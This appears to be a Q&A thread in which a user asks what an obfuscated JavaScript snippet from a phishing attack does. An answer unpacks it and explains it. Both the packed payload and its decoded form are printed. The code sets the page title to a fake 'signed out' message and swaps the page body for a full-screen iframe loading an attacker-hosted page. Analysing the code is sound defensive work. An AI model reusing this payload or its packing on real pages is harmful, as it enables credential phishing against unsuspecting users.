javascripthtmlemailxssphishing

How to breakdown this JavaScript phishing code?


A friend of mine was phished used a new technique by encoding html messages in the location bar. Decoding it I found this:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3.2.j="i h k l n";m{(g(){f 1=3.2.9(\'1\');1.8=\'7/x-4\';1.a=\'b 4\';1.c=\'\';2.p(\'B\')[0].C(1)}())}E(e){}3.2.z.y="<6 s=\\"r://q.t/u/w.v\\" o=\\"D: 0;A: 5%;d:5%\\"></6>";',41,41,'|link|document|window|icon|100|iframe|image|type|createElement|rel|shortcut|href|height||var|function|have|You|title|been|Signed|try|out|style|getElementsByTagName|rosettatranslation|http|src|top|ourclients|html|oreiwn||outerHTML|body|width|head|appendChild|border|catch'.split('|'),0,{}))

I just need a breakdown of what this code does.


Solution

  • The code is packed, probably just to make the data shorter. Putting it into UnPacker gives:

    window.document.title = "You have been Signed out";
    try {
        (function()
            {
            var link = window.document.createElement('link');
            link.type = 'image/x-icon';
            link.rel = 'shortcut icon';
            link.href = '';
            document.getElementsByTagName('head')[0].appendChild(link)
        }
        ())
    } catch(e) {
    }
    window.document.body.outerHTML = "<iframe src=\"http://[...].top/ourclients/oreiwn.html\" style=\"border: 0;
        width: 100%;
        height:100%\"></iframe>";
    

    So, it modifies the page to add an iframe with the contents of another site.